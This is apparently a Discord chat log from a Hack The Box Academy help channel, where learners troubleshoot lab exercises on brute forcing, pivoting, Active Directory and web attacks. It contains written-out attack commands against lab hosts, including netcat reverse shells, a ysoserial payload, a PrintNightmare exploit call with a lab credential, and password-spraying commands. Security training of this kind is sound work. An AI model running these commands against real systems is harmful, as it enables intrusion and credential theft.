#modules
@autumn pilot I'm about to release a 30 episode series on the htb academy job path its not against the very clear content guidelines that i for sure read yeah?
So r u guys into automation or Game Creation
can you give me some context
thanks for the contribution HAHAHAHAHA
none XD
Didn't you ask a similar question three months ago?
lol what is going on
They need to read #welcome and acquire basic reading comprehension skills first
I don't even remember when I joined d server
difficult task
How I hack and mine for fish?
September
Wow just want to get me off the server right
I can't really think of a use for -w - other than seq a b tbh
I mean if you read #welcome you can figure out how to access more of the server
sheesh my server time is going to end before I get result for https://academy.hackthebox.com/module/54/section/511 this question - One of the pages you will identify should say 'You don't have access!'. What is the full page URL?
Then you're likely doing something wrong
Ah thank you, good to know
Most academy stuff doesn't take more than the initial lifetime of the target
So I created A Game and want u guys to rate it It is a very basic Game
good to know
U r so negative to me
```python
import pygame
import pytest
import time
import random

pygame.font.init()

WIDTH, HEIGHT = 800, 640
WIN = pygame.display.set_mode((WIDTH, HEIGHT))
pygame.display.set_caption("Space Ranger")

BG = pygame.transform.scale(pygame.image.load("Bg Img.jpg"), (WIDTH, HEIGHT))

PLAYER_WIDTH = 40
PLAYER_HEIGHT = 60
PLAYER_VEL = 5
STAR_WIDTH = 10
STAR_HEIGHT = 20
STAR_VEL = 3

FONT = pygame.font.SysFont("comicsans", 30)


def draw(player, elapsed_time, stars):
    WIN.blit(BG, (0, 0))

    '''pause_text = FONT.render("Pause", 1, "white")
    WIN.blit(pause_text, (10, 50))'''

    time_text = FONT.render(f"Time: {round(elapsed_time)}s", 1, "white")
    WIN.blit(time_text, (10, 10))

    pygame.draw.rect(WIN, ("red"), player)

    for star in stars:
        pygame.draw.rect(WIN, "white", star)

    pygame.display.update()
```
This is half of it
Amazing game
0 for the use of comic sans.
loved it, better than overwatch
Gta6 who?
lol BG = pygame.transform.scale(pygame.image.load("Bg Img.jpg"), (WIDTH, HEIGHT))
```python
def main():
    run = True

    player = pygame.Rect(400, HEIGHT - PLAYER_HEIGHT, PLAYER_WIDTH, PLAYER_HEIGHT)
    clock = pygame.time.Clock()
    start_time = time.time()
    elapsed_time = 0

    star_add_increment = 2000
    star_count = 0

    stars = []
    hit = []
```
Even better now
Imagine thinking it's a good idea to make a game with python.
Tell that to EVE
The servers aren't the game though.
The game uses Python too
How do I post a file here
hello y'all, anyone who can give me a hand with a Java issue?, a bit of context: I found in exploitdb the exploit 44553.py but when I run the command java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections1 'nc -nv 10.0.0.5 4040' I'm receiving this Java error
Hi, I'm on Login Brute Forcing - Skill Assessment Service Login.
1st Question: " As you now have the name of an employee from the previous skills assessment question, try to gather basic information about them, and generate a custom password wordlist that meets the password policy. Also use 'usernameGenerator' to generate potential usernames for the employee. Finally, try to brute force the SSH server shown above to get the flag."
I have a question about the username but I don't want to spoil it here neither with spoilers, can I DM someone about it?
course I pointed to my PC not 10.0.0.5
Oh, that's here
Great.
Sorry, I thought I was in general
no worries ^^
Is that part of a module @dull thistle ?
Yes " Login Brute Forcing "
All good
I'm failing so hard.
Happy to answer any questions @ocean night !
sorry don't understand
hes asking if your java exploit question is module related
I meant is the question you asked related to a module?
Feel free to DM, can't spoil but if I can answer the question without spoiling I will do
oh sorry @ocean night @thorn urchin , yes my question is related to Other Notable Applications, more exact about question 2
the RCE access
I'm pretty sure you don't need to use ysoserial unless you're doing the Deserialization Attacks module
Can't DM you because of your settings
Accepted
ok, understood maybe I need to search for a different exploit instead, thz btw
I know the answer to this but my scan is still running and I didn't get to the ||linux php7 || page. I went recursive 1 should I have done recursive 2 or 3?
¯\_(ツ)_/¯
Have you tried it?
i found it in less than a minute xD
no my scan hasn't found it my googleFu did lol
wuot
amazing bro
That was a good ten minutes
leet hacker skillz
any hint?

guys anyone have a path to start in HTB machines and academy ( Free Machines And need a path in the academy that wont require me paid boxes later ) i really want to start in all field of hacking ( Web / Crypto / Low Level )
yup, Other Notable Applications
learn assembly, then C#, then python or javascript and PowerShell
you noticed that i asked for a path FROM HTB
that means when answering me you should provide me with source FROM HTB
searchsploit weblogic and one of those works
just stick to academy
ignore boxes xd
is starting in machines better ?
they will always be a source to practice specific attacks
If you head over to https://academy.hackthebox.com, go to Modules and filter by Tier 0, you'll see plenty of content to get you started
I agree, get some fundamentals first
I haven't installed searchsploit, that's why I'm using exploitdb
Machines tend to require some prior knowledge and experience
its the same
I know
one of the exploits for that weblogic version under exploitdb will give u the flag
Starting Point on https://app.hackthebox.com is also a good place to start
no.
Hi I'm on the Linux File Transfer Module and I'm curious on why we must have a self-signed certificate for our python web-server.
we do not.
just in case we want the communications to be encrypted
I already know how to install most of linux distros, troubleshoot them install windows and troubleshoot it and understand how networks works in basic level and what a lot of tools in cybersecurity used in offense and defence and a good understand of electrical engineering and also web technologies and how it works
but almost all the exploit are referred to Deserialization RCE
and many attack surfaces and types
Check out some social channels like ippsec and 0xdf too.. they do awesome walkthroughs, including tooling and process.
just start and aim for some certification
yeah they are informative
dont try to find the perfect path
oscp not a good start ?
yes it is a good starting cert
if u can pay go ahead
perfection is impossible
Hi everyone
am still 16 lol
oh ok cool thanks!
thnx man will see
Hey guys would anyone be able to give me a hand on AD enumeration & attacks ACL Abuse Tactics. The task is to follow the steps above and set the user adunn SPN so you can kerberoast but I keep getting failed user damundsen doesn't exist? Thanks
@sly dome 48971.py?
The module describes a tool you should be using
Not that there's an exploitdb entry out there as well, but yeah
Been stuck on this question on WINDOWS EVENT LOGS & FINDING EVIL for forever: "Utilize the Get-WinEvent cmdlet to traverse all event logs located within the "C:\Tools\chainsaw\EVTX-ATTACK-SAMPLES\Lateral Movement" directory and determine when the \*\PRINT share was added." I've read through the module multiple times, tried all the commands I can come up with, went ahead and looked through the event viewer and nothing. Any suggestions?
iirc, it took you that long because you didn't do it correctly.
hmm, what's missing? -|| ffuf -ic -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt:FUZZ -u http://faculty.academy.htb:42112/FUZZ -recursion -recursion-depth 1 -e .php7 -v -t 80||
clunky syntax
I don't know why you're running it like that, but maybe I misread what you posted.
iirc you were supposed to find the one extension that is not used on the other domains, and then enumerate from there.
let me check my notes
oh that's why
I'm not figuring out what tool do you mean, I read Other Notable Applications section once again and not catch it
I misunderstood, should have read slower. I tried to scan all the subdomains at once, then tried to scan every extension. I did cancel the thing multiple times.
I found the default creds and got access to the app
Hey. Were you ever able to figure this out?
From my notes: directory-list-2.3-small.txt has 87664 words... two sites have two different extensions while the third site has a third. If you don't pick up on using the third site + third extension, you would be waiting on 701312 searches.
wow good note taking
thanks, that explains why it took so long
I honestly think the example given is both realistic and a bad example
Hi ! I'm stuck on Privileged Access in AD Enumeration and Attack. I try to do this question : "What host can this user access via WinRM? (just the computer name)" I just try everything and impossible to find this f*cking host.
I tried :
-> Cypher query provided in the course = KO
-> With Powerview = KO
I tried to find another cypher query or another methods to have this info : impossible to find it.
Do you have an idea ?
Which skill assessment step? There are three
@ocean night are you using bloodhound to answer this question?
I'm not answering anything
no, no, it's not related to the skills assessments, is related to Other Notable Applications
Ok let me just DM to stop spamming here
ok.
Hunting Evil with YARA (Windows Edition)
have you tried looking for that string in all logs?
@ocean night can i DM you shortly? would love to get your feedback about something
Depends what it is
just a link
ok, but I reserve the right to run as fast as I can
surely
fix: move files out of folder
Bad rulesets then?
yup
the shell_detector.yar, idk what it was yapping about, but seatbelt.yar indeed had an empty string
Anyone done malware analysis module?
why is the linux fundamentals module so damn confusing
haven't done it yet but what are you confused over?
Some of the stuff isn't well explained for the questions, but at the same time some rtfm helps
It jumps all over the place.
it feels like a lot of the tasks dont come with the how to's
like i'll find the solution through this server or through google, and the very next thing teaches me the solution i just learned from google
atp im gonna redo all the tasks after finishing it
htb is an amazing resource, especially for being available freely, but i just wish it was structured a bit differently
Linux funds is the only one that bounces like that
The rest are contained per section
ohhh okay okay thats good to hear
It's more about, take the list of commands they give you and apply some thinking
Which does still apply to the other modules
that parts fine, but in the module im currently in most of the commands they give me havent been explained
They give a brief overview of the commands in the section that lists them
the Permission Management section is confusing me
What's the best way to report typos in academy content?
I'm on Command Injection->Identifying filters and answer the question at the end for which item is not blacklisted. I have in burp that|| & ||is not filtered but still says i'm wrong. What am I missing? https://academy.hackthebox.com/module/109/section/1035
-rwxr-xr-x i dont understand reading these
- indicates if it's a directory or not (if it's a d, it's a directory) then you have a 3 octal set of permissions. r = 1, w=2, x=3
I remember hating the idea of ever learning how that permission format worked
Add them together to get your permission set
accurate
4=r-x which means read and execute permissions
The first set of three indicates user perms
Second set indicates group
chat gpt goated
there's stuff besides d too
Third represents everyone else
Keeping it basic
If it's an s then it's part of the challenge /s
bruh wth
For most purposes you don't need to know about sticky bit (which replaces the execute bit)
Sticky just means it executes as the owner file owner
-rwxr-xr-x
so the first portion is for owner
second portion is for group (non guests on the machine to my understanding)
and the last portion is for people who are guests on the machine
idk im not sure what the difference between group and other is
symlink l another one of the first column?
Groups are just a set of users
Thanks I knew I forgot something
ohhh so thats js something thats mentioned and not explained?
Everyone else (the last section) is everyone not defined within the owner / group section
For the purposes of basics, it's not necessary
ahh okay okay
so what's binary notation
The cool way where it's numbers instead of letters
W
is that necessary to be able to use?
like i understand the concept, but i cant imagine it being useful or faster
unless i memorized all possible combinations
Worth knowing both since you'll see both in different contexts
You only have to memorize what each number represents
421
rwx
Then just know that each of the 3 numbers represents a section (owner, group, everyone else)
Each column (of e.g. chmod 754 bleh), is a representative of what each section of users can do. 7 in binary is 111, so the user can rwx.. 5 in binary is 101, so the user can r-x (- denotes no permission).. 4 in binary is 100, so the user can r--
I think that's right anyway
Owner, Group, Everyone
I second
i feel like 421 is a little easier to translate in my head, is there any benefit to remember the binary?
No need to remember binary tbh
4+2+1 = 7
IIRC you can create a file in a directory without write permission, but can't write to it
or something like that
It's really weird
Gonna have to dig through my notes to find that reference
Ok no, not that.. what was it then
Had it in a vulnhub machine ages ago, and it felt really weird
God damn what was it.. maybe rename?
001, 010, 100 would be the binary for 1,2,4
You just turn a bit in that sequence on/off
for htb, switch everything to 777 /s
short question, where do i find server and port ?
For one of the challenges?
For the labs you're generally gonna be given an ip and/or port to attack
Format: ip:port
Lol good luck if they only give you a port
Hi, I'm working on the Easy lab of the skill assessment in the Password Attacks module. I've discovered two services, and with no further information/hints the only solution is bruteforcing :(. I'm using the username and password list provided in the module, and I wondered if there is any way to optimize it? Like bruteforcing the usernames first and after finding the right username, bruteforce for the password?
In previous lab I was able to avoid bruteforcing through the whole username list because we had access to the machine earlier and I could extract the possible usernames from there, which allowed me to narrow down the search dramatically.
I haven't done that module, but with my experiences in the modules you usually have to use a different but similar command / input, in this case your wordlist
Okay, but generally, is there any way to bruteforce usernames alone?
Yeah, to validate which users exist on the service, but I don't think that's possible because hydra only gets a hit when there's a successful login attempt
Ah
Yeah generally it's bad security to provide feedback on whether or not a user exists
To avoid user enumeration
Make sure you can't just do a null login ;)
yeah I guessed so
I dont recall that module too well
Lol
Did you solve this task? I have already identified the kind of malware that was running, but I can't seem to find the correct answer
I would think the best approach in this scenario would be to use a short list of passwords in combination with a list of common usernames
But I should see if I can read the module to give better advice than that
Yep, this
can someone give me a hint or advice as to why this won't execute correctly? I am trying to complete the last question of the bleeding edge vulnerability section
Missing library perhaps
same as u, i am not clear about the question.....or did u solve it?
Thanks, I know, but the bruteforce process takes half an hour with the vanilla user& password list, and 111hr with the mutated password list, so I wanted to see if there are any possible optimizations to this long process
show me your smbclient.py command
Check any parameters regarding multithreading, doubt any mutation needed on an Easy section
For example, in bruteforcing the right username initially, and then with one username bruteforce the password, which might make it exponentially more efficient
@sly dome can I DM you everything i did ?
you have the -u flag in hydra
no
just show me your smbclient command
Always try to imagine what the easiest version of a technique would be when trying to find a solution
You can bet money that the easy section of anything in HTB won't require more than minimal compute power
@sly dome ||sudo smbserver.py -smb2support CompData /path/to/backupscript.dl||l
ok
Thanks for all the suggestions!
@sly dome still not working when trying to run this -|| sudo python3 CVE-2021-1675.py inlanefreight.local/forend:Klmcargo2@172.16.5.5 '\172.16.5.225\CompData\backupscript.dll'|| - thoughts?
btw to tell windows to fetch a smb file you must use \\ at the beginning
@sly dome so i do have that - think when pasting it removes it - but i have '\ followed by the IP...if my dll of backupscript is in the htb home directory should i really be running smb from there or some other directory and since it is running from there do i need to supply it with /home/htb-student/.dll?
Will DM you
it doesnt matter
if ur running from the current directory and its there u can just do $(pwd)
dont use the file in the path
thats an error
if its on htb-student's home
you just put /home/htb-student in the smbclient command
@sly dome So when I run I get this error....
```
Traceback (most recent call last):
  File "/opt/CVE-2021-1675/CVE-2021-1675.py", line 188, in <module>
    main(dce, pDriverPath, options.share)
  File "/opt/CVE-2021-1675/CVE-2021-1675.py", line 93, in main
    resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20211013.152215.3fe2d73a-py3.9.egg/impacket/dcerpc/v5/rprn.py", line 636, in hRpcAddPrinterDriverEx
    return dce.request(request)
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20211013.152215.3fe2d73a-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 880, in request
    raise exception
impacket.dcerpc.v5.rprn.DCERPCSessionError: RPRN SessionError: code: 0x2 - ERROR_FILE_NOT_FOUND - The system cannot find the file specified.
```
ok - let me retry based off that advice - ty
typo? YARA and Sigma rules... This section is about Sigma
See you posted in erratum also, it'll be handled. Thank you ❤️
i did, but now I'm not sure if I'm being stupid. so I'll just leave it up here
Honestly I'm not sure either, but it does seem to contradict itself
Ok so on detection matches with OR, and another with AND?
it did, but then I kept reading and it mentioned it different later on, so it might just be me misunderstanding
What's right is that it is confusing tho and should probably be moved a bit below for more clarity
night
Hey guys, Ive got a question, just completed the skill assessment of the File Upload Attacks and I got the right payload quickly but it took so much time to figure out why I wasnt getting a sensible response from the server - without spoilers, after ||reading the source|| and figuring out "everything" I crafted a payload, but for some weird reason was getting this response, until after prepending the payload with another payload(spoiler) it finally allowed me execute commands. Would love an explanation, thank you very much
nerd
Nerds are cool.
what do you guys do when your eyes get tired
also, how should i pick what modules to do next
Shower or sleep, caffeine will just make you crash harder. As for modules, depends what you're interested in.
im gonna run my head under cold water
understood, thank you for telling.
i wanna ask smth about the "windows credentials hunting" section in password attacks module
the question that asks for winSCP password, is there a way to get it without the 3rd party tools, like lazagne.exe?
I am confused as to why Mimikatz works but the normal Powershell does not when dealing with smb. Both Powershell and cmd.exe are being "ran" under the same user in this context. This is for Password Attacks > Pass the Hash (PtH)
never did the module. but perhaps it has applied a kerberos ticket to the session impersonating an admin on DC01 (a different computer) hence why it works, perhaps? maybe someone can answer better
Yup, Lazagne is just a tool with all collection techniques compiled together. So you can search for blogs for the manual method or best read the source code for Lazagne to see how it particularly extracts the WinSCP Password.
will search into that
This module uses NTLM. I read the following on a site but do not fully understand how using and then replacing fake information helps.
```
Mimikatz can perform the well-known operation "Pass-The-Hash" to run a process under another credentials with NTLM hash of the user's password, instead of its real password. For this, it starts a process with a fake identity, then replaces fake information (NTLM hash of the fake password) with real information (NTLM hash of the real password).
```
https://blog.notso.pro/2020-05-09-offops-in-ad-1/
Well, a ticket is requested when an authentication is attempted against the DC as far as I know.
The reason you can access it through mimikatz is because you are authenticated in the session (impersonating) a user with the necessary privileges
Certainly there are alternatives, but if the module recommends it then it's a tool you can use
Ah I see, that makes sense. Appreciate it.
@regal stream If you did a klist on both sessions, you'd see the difference that the service tickets has on each of them. I'm not exactly sure, but I guess when doing pth, Mimikatz automatically requests and injects the ticket into its session I believe. Like what @supple gorge said (correct me if I might be wrong)
Nothing wrong with relying upon tools made by others, they can be part of your toolkit. Doing things from scratch is very gratifying, but make use of the tools available.
Did you sleep only for 2 hours or didn't sleep at all? xD
yeah i tried to get it manually but werent able so went on to use the tool 
I had a nap, woke up and couldn't get back to sleep, so thought I'd work instead
AWS fun times
I also thought it weird that after wishing goodnight you popped right in. It's my turn to go on the goodnight train. Hopefully I stay there until tomorrow lol
nn, have a good sleep
Im having trouble understanding what i need to change for submitting the url in the XSS phishing lab i have created the malicious url and set up a site to redirect to the malicious url and put that through bitly i cant seem to get this url to send without getting "Issue in sending URL!"
bitly?
Take a step back, do exactly what was explained in the section, your payload should get rid of the form on top of yours(I dont think you would get a response if you have 2 forms on a page), pass the url of the page where your injected form is at to the input field on the submit page and wait for a response on your php server. Stick to techniques taught in the section... Saves you the mental trauma, you absolutely do not need bitly for anything.
absolutely no response? try to reset the machine (that also looks like a very inappropriate vhost name)
Wrong URL.
Hmm I've tried many different even with .academy. so not sure where I went wrong with that
It should work - Try a reset and use the right vhost, run the first time to detect bogus param names run a second to filter those.
How to exploit string comparision in a PHP site
Depends, if its a login page - You could test for the use of loose comparison instead of strict comparison (that would give you a type juggling vulner you can abuse to bypass the login page)
lol of course you dont have access to that, its on the backend server itself. - Unless its a whitebox test or you found a way to read that.
Can I DM you for a sec?
You dont, you pass an empty array as username/password, read up on that and play with burp.
Alrighty.
Thank you
send FR
Youre welcome - Altho this channel is for academy modules, mods are probably not around, you should take this to the "general" channel next time.
hey guys can anyone help me with the password attack module hard lab i am not able to crack the password of johanna for the initial foothold i tried CME to password spray for user Johanna and used the mutated password list ... thanks
Hi, can anyone nudge me in the right direction of the medium lab of password attack module? I am on dennis and can't find a way to privesc
Did you try a generic password list instead?
Why don't you save his ssh key for later ;)
I've never seen this kind of reuse, guess that a first time for me. Thanks!
The question to ask: why is there a password?
You're right, when I thought about this it seemed strange and that's what led me to try it
did you mean the one provided in the resources then yes
No, I meant like rockyou (but a smaller list)
oh ...thanks let me try
I have a question in the Skills assessment when pivoting to the second into the 2nd subnet. I have done the pivoting the way the course has taught me. But now I am wondering how I would connect back using ligolo. If I have the agent on the internal network meaning 172.x.5.x and would want to connect back to my proxy. How would I do that? Which IP would I have to type. Given that its not connected to my own network?
meaning from the DC back to ligolo
double pivot? open a listener from the first subnet to the ligolo server port on your attack host, then connect the ligolo agent in the second subnet to that listener in the first subnet
Can I dm you?
yes thats what Im trying. But that listener in the first subnet. Do I have to run another proxy? say thats windows host. How do I run that listener back to the attack host. I feel stupid asking this, its like Im completely forgetting something
you need to run the listener on a host that has access to both subnets
found it. That was turning me mad
What's going on with the introduction to digital forensics module? The spawnable instance doesn't have the things mentioned in the section
I can't spawn a machine for the life of me.
rip, refresh page and reset, I think some recommended changing the thing from udp to tcp. what section you haggling with?
i just got one finally.
took about 15 mins. im using pwnbox cuz i tried for hours last night and couldn't get the exploit to work
is that for win attack and defense?
good thinking on using the pwnbox, hope it works
Yeah. last section
got it to load but
This section has been a real fucking pain in my ass
You ok if i send you a dm?
sure
Is there someone that have finished the Advanced XSS and CSRF exploitation module ?
Probably
I need just a small tip on the last exercise... struggling to find the correct parameter name for one of the api endpoints
Have you managed to bruteforce the password for Johanna?
hello
i am new here
i have a problem with the section about DNS enumeration, on the path to CBBH
https://academy.hackthebox.com/module/144/section/1256
I have completed questions until now,
"What is the FQDN of the IP address 10.10.34.136?"
this question is about a private IP address that i cant ping,
there are no records with "dig any 10.10.34.136"
no records either with nslookup, whois specifies that this kind of address is only for private networks, so if there are no records on the network's DNS, how can I retrieve any information at all ??
thanks for your help !
because the question is mildly misleading if you're not sure how you're meant to get the answer
you're supposed to dig against the target IP, not the IP in the question
also dig axfr will net you better results than any
i tried also with @ns.inlanefreight.htb at the end
again
and also with dig axfr
if you don't have inlanefreight.htb in your /etc/hosts
it's not gonna know
because .htb isn't a valid/registered tld
it's there...
you can do @IP
the target IP is the spawned IP from the button "click here to spawn"
here you can see that there are 0 answers when i run the command
facepalm
dude
you're not getting the point
dig axfr inlanefreight.htb @ip
look for that IP in that result
oh
i will try that
if not dig through one of the subdomains
@fathom pendant Can you give me a clue about the johanna password bruteforce? Tried general and popular password lists and haven't found anything. Currently using mut_password.list and it is taking ages.
i don't recall which list i used
First letter of the password if you recall/can check? Just to see how close I am. It's supposed to be in this mut_password.list
What's your command, put it in spoilers
the ip for the specific question is different from the one i spawned, which i used as DNS for all the other questions
yes.... that's because the IP will be ON the DNS records
How can I put something in spoilers?
||First I tried with CME but it took ages: crackmapexec smb $IP -u johanna -p mut_password.list and then I looked at HTB Forums and someone suggested to bruteforce RDP because crowbar is much faster so I tried: crowbar -b rdp -u johanna -C mut_password.list -s $IP/32 -v||
try bruteforcing the user against a different service
wait my mistake
i never used crowbar for this fwiw
Yeah, cme will work, you do need the mutated list you were using, but you're missing the --local-auth flag, its explained earlier in the module
^
Oh, I'll look at it, thanks!
windows is weird about it
How long is it supposed to take approximately? tired of just waiting for it to find the password
After you add that flag, it'll be a few minutes at most
Okay, tysm
note you can go one more level deeper (look for 127.0.0.1)

all about understanding what you can do
also the screenshot reveals some of the answers i believe for other questions
so i should delete
yes
as stated though: it may not be on the initial dig - always look if you can go deeper - in this case you can dig one more subdomain in
Im assuming you ended up getting this. If no DM me.
i finaaaaly got it !! thx i was blocked since yesterday xD
I got it dw
i would be devastated to be stuck on something for 2 months ngl
I still didn't get the password
Actually no I dont have it
I ran the listener. But on the internal network, what IP do I type. Im supposed to put my attack IP as per every guide out there but there is no route between them from the internal network. So how would it know to connect to my attack IP ?
@fathom pendant could you maybe input on this
Im having issues with double pivot on Ligolo.
if you don't have a route between the host and your attack box, how are you getting a shell?
no @languid wharf still no progress yet
Can I dm u?
yeah sure
how do I know where the path is for the user's email in linux?
Strange, that should have worked, it's not far down the list
env
First letter? Just to get an estimate about how far down it is. Maybe my machine works really slow but I don't think so
ah thanks
I get that. So for example when on the Internal machine I connect back to ubuntu with nc and forward that port to my attack machine, then I get a shell. But when I try to execute the agent on the internal windows machine and connect back through the ubuntu then I see connection refused on ligolo
oh do I have to set another agent on ubuntu too?
starts with ||1||, double-checked my notes and it should be working, maybe something broke, try restarting the target
idk what ubuntu or windows machine's ips are and their subnet
I'll try it, thanks. ||1 as in the first 1000 passwords or so?||
as I've said, open a listener on the pivot host of the first subnet to the ligolo server listening port, then connect the agent of the second subnet pivot host to that listener of the first subnet
as in first character of the password, would have to boot up my VM to check what position it is, I just recall it only took a couple of minutes
Okay, thanks for the help
okay I will go through it very slowly again
yes that is exactly what I am doing... I get this ERRO[2649] dial tcp 127.0.0.1:11602: connect: connection refused
what's the proxy server listening port
so Ive deleted all listeners and started over
│ AGENT │ AGENT LISTENER ADDRESS │ PROXY REDIRECT ADDRESS │
www-data@inlanefreight.local │ 0.0.0.0:11601 │ 127.0.0.1:11601
no I have to do ./agent.exe -connect UbuntuInternalIP:11601 -ignore-cert
correct?
on the Windows machine, because they both share a network
if the windows machine can connect to the ubuntu machine, and ubuntu has a listener running then yes
so I have to put the proxy on the ubuntu machine too, and then from there start a listener? That would be weird. having the listener EXACTLY like ive tried but with a nc reverse shell it works
but when I try to connect back with an agent I get connection refused
no the proxy only runs on your attack host
nc 172.16.5.15 11601 -e cmd
so this works and I get a reverse shell
but this doesnt
./agent.exe -connect 172.16.5.15:11601 -ignore-cert
you didn't answer my question, what port was the proxy listening when you started it

there you go, agents need to connect to proxy port
let me try
@hallow kiln Restarted the machine, CME has tried all the passwords that start with ||1|| and it still doesn't work : (
try to enter from the pwnbox ( it is faster the bruteforcing ) and run the mutated list
I'll try, thanks
okay no thats confusing. So what you are saying is do this ?
./agent.exe -connect 172.16.5.15:5555 -ignore-cert ? Then what did I set up the listener for
Im sorry if Im being slow here
Im sure once it works Ima hit myself
open a listener on the pivot host of the first subnet to the ligolo server listening port
your server listening port is 5555
oh
I see yea right
let me try that
ah that makes sense
I hope that works
connection refused
jesus christ what is going on
My lab also crashed
@torpid zinc it worked! Thanks! Do you know why it might've failed from my vm?
not to be honest, maybe because of the connection but not sure at all
Okay, thanks for all the help everyone!
Hello together
Could someone please help me with intro to assembly language : shellcoding tools?
It doesn't work either with msfvenom nor when I wrote a Script in an asm- File.
The parts which are needed are in this Section, I know and based on that, I wrote a Script, but that doesn't seem to work. Could someone please help me? Maybe, that I send the parts which I figured out per DM? I am for sure only overlooking a small detail, but don't get it, so could someone please help me with this one, where I've been stuck for countless days. 😦
thanks a lot
Could someone help me?
I'm currently doing SECURITY MONITORING & SIEM FUNDAMENTALS.
Now the funny Part is, in Module 9:
SIEM Visualization Example 4: Users Added Or Removed From A Local Group (Within A Specific Timeframe)
I get the Task:
Navigate to http://[Target IP]:5601, click on the side navigation toggle, and click on "Dashboard". Extend the visualization we created or the "User added or removed from a local group" visualization, if it is available, and enter the common date on which all returned events took place as your answer. Answer format: 20XX-0X-0X
I build the dashboard but as soon as I use the timestamps I don't get any more records as there isn't any newer entry than 05 March 2023...
I did it as shown in the guide.
Is there any bug or something?
are you using all time?
Do you see the different dashboard with the different sections? That should already be pre made
ls -la
Hey all I am struggling with the JavaScript Deobfuscation question. The answer that I have looks correct as in it is in leet speak but I keep getting an incorrect response
are you sure you're answering the right question
read carefully
Thanks, worked with the pre build !
leet speak?
are you sending a POST to web server?
@fathom pendant I have no idea. I have tried naming the type of encoding pasting in various commands that I used to decode. The question isn't really a question
@supple gorge I am
what are the routes
read the last part of the question, what does it say to do? are you doing that?
I did that yes to the best of my ability
so you did 2 POST requests?
That is where I am lost can I DM you
I am on the Active Directory Module Section "Internal Password Spraying - From Linux"
What Username list should i use here ?
sure, if you're unsure how to do what the question is asking, it was done in the section a bit above
@supple gorge sent
explain more why it's not working
I was so silly, I'm used to crypto and decoding so I was like wtf, how is this not the answer, trying to figure out what encoding i was missing.
Turns out I was missing a step
@supple gorge Thanks for the assist
reading the actual question? (was it the Source question?
it was the one that you had to get the decoded answer and send it in a post
ah yeah
Thank you both
the one you decode from the previous question
This is why I love HTB because it is a pain to learn this stuff but I now completely understand the concept behind it
i have a question for the hard lab in password attacks module ( i will add spoilers because i am not sure if it is or not ). || After you find the backup file, how can you identify that is encrypted with bitlocker? ||
Hi everyone, I'm currently doing https://academy.hackthebox.com/module/115/section/1139 (The live engagement), working on the 2nd machine (blog.inlanefreight.local), while I understand how to exploit this, I wonder how you would get these credentials without the hint here, are we meant to for example just run burp on the environment and brute force it with a random wordlist? Did not think this was the way as the speeds are also pretty slow on this machine.
file *.vhd
iirc
or you just try mounting and find out the hard way
nvm I'm stupid I didn't check the desktop 🤦🏼‍♂️
check the desktop
LMAO
you wouldn't believe how many people ABSOLUTELY miss it
glad I'm not alone
okay it worked ... FUCKING FINALLY
but does that mean that every .vhd file is encrypted? i thought it is not a fact
...
there's literally a command called file
i tried it but the output is the following "Backup.vhd: DOS/MBR boot sector MS-MBR Windows 7 english at offset 0x163 "Invalid partition table" at offset 0x17b "Error loading operating system" at offset 0x19a "Missing operating system"; partition 1 : ID=0xee, start-CHS (0x0,0,2), end-CHS (0xf,254,63), startsector 1, 4294967295 sectors"
maybe because there are the errors in the output you can understand that something is wrong? but still i dont know if it is a logical conclusion to think about bitlocker
you can also make a logical conclusion (based off it being windows) and it being named a certain way that cracking it would be necessary
hmm okay thank you very much
Anyone got an idea? still stuck at the question:
Find the user account starting with the letter "s" that has the password Welcome1. Submit the username as your answer.
is it possible that the linux fundamentals module provided the wrong password/login for SSH in the "system information" section :)
Hi guys still stuck on starting a web server with php, I'm using this command: php -S localhost:8080, any hints?
it should work
am i using the wrong IP for SSH then
you should be using the ip from "click here to spawn target"
what module
Hey guys, I'm stucking in a lab "Skills Assessment - WordPress", I've set the /etc/hosts to ping to the server's ip but it isn't working, any tip?
This is the working with web services module
thats the IP the instance is running on right
like the one that shwos in my terminal
no
oh!
this IP
Hi for bash scripting
what am I doing wrong
get a list of users in the domain
I tried putting then in the next line
isn't there a thing with echo that causes it to add a newline
\n?
ye echo by default tags a newline - try adding -n (to the initial encoding?)
I dunno about that. This is all thats mentioned in the module
¯\_(ツ)_/¯
found the error, a blank is needed between if and [
you mean a space
can someone let me know why this won't work here? I imported AD, but still nothing...would I need to use powerview?
you might need to import powerview
but also it tells you that the parameter you described does not exist
powershell does support tab autocomplete
ok...maybe that is why
that's the ActiveDirectory module, not powerview
but even when trying to run what is outlined in the text it won't work either
so i did import powerview and it worked...with GetDomain and the text
Hi, in the shells&payloads module, the antak shell section, I got the shell on the system and whoami but it is refusing the answer
like i said
Status.inlanefreight.local
there is a difference in when you upload/access via the right subdomain
one gets you the /application or whatever the other gets you the other one
Wdym?
Maybe take to DM if you think what you're going to post includes spoilers
(if MarcieLee is ok with it)
i'm taking a moment to upload and check
yep i get the intended answer doing exactly what's described
dm me and include the browser url at the top that you're using
Ok
im trying to find the history in home directory but cant find it when I type in ls -la, what am i doing wrong?
history is .bashhistory
...
thanks alot
yeah
Any day you learn something is a good day.
humu i see thanks!
you can also just do cd without any args and it'll take you home
ouh yeah learned that bfr kinda forgot abt it
thanks for sharing tho
the second question i had to google tho cuz i refered the section it didnt rlly show how to do it
like checking the sudoers index number
well it comes with some research
you know ls lists info
you can do something like man ls or ls -h to find out other flags aside from the shown -la flags
that made me snort
touch grass
touch: cannot touch 'grass': Permission denied
haaahaha
what are good machines for wordpress hacking? I just finish that module and want more practice
Use that academy x path feature
then?
Also iirc after completing a module I think if u scrolled you would find like tons of stuffs
Then you would find what you r looking for
wtf lol I did get u homie
It's actually academy x htb labs
guys, is lowered attention span, aka getting distracted easier a symptom of burn out? been doing academy every day all day for the past week.
yes
you're losing some level of interest in grinding it out
limit time to a few hours or don't be afraid to just step away for a day or two
let your mind rest and absorb your recently learned info
Same, but gotta do what must be done to succeed
ugh, unfortunately...
It requires some extra efforts to be the protagonist 
ngl bro; this ain't it chief
gotta see what's the minimum break to get back at it... currently trying to power through the digital forensics module, (almost done with the path)
holy shit, this is awesome.... thank you sir!
just step away for a day or two, then sit back down and get back at it
maybe go back and recheck what you've done previously
